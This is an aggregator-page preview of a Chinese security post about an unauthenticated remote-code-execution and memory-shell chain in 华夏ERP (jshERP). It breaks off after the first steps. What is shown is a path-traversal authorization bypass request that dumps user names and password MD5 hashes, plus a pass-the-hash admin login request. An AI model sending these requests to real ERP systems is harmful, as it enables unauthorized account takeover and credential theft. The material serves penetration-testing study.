注册    登录
专栏名称: 李白你好
《网络¥安全联盟站》-专注于渗透测试、红蓝对抗等技术,定期分享网络¥安全学习资料和教程,关注了解更多安全资讯~
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
相关文章推荐
今天看啥  ›  专栏  ›  李白你好

华夏ERP全版本未授权RCE及内存马注入

李白你好  · 公众号  ·  · 2024-08-27 08:00
    

文章预览

免责声明: 由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 1 ► 前言 华夏ERP全版本未授权RCE及内存马注入。 本文来自 《实战攻防》课程开源应用渗透利用篇 。作者: xiuxian 点击下文了解详情👇 实战攻防 & & 实战渗透强势来袭 2 ► 权限绕过 目前最新版V3.3 GET/jshERP-boot/platformConfig/getPlatform/..; /..;/ ..; /jshERP-boot/user /getAllList HTTP/ 1.1 通过getAllList读取用户名,密码MD5值。 Hash登录 使用读取得密码MD5值登录超级管理员后台。 POST /jshERP-boot/user/login HTTP/1.1 Host : IP Content-Length : 67 Accept : app ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
晓磊的基金生活  ·  #基金# 根据Wind报道10年期国债及国开活跃券下行超2bp,-20240722144822
8 月前
上海长宁  ·  早安,长宁丨阴雨天气上线,出门记得带伞哦~
1 月前
关于     ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科   ·   51好读   ·   小百科(海外)   ·   Link管理
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号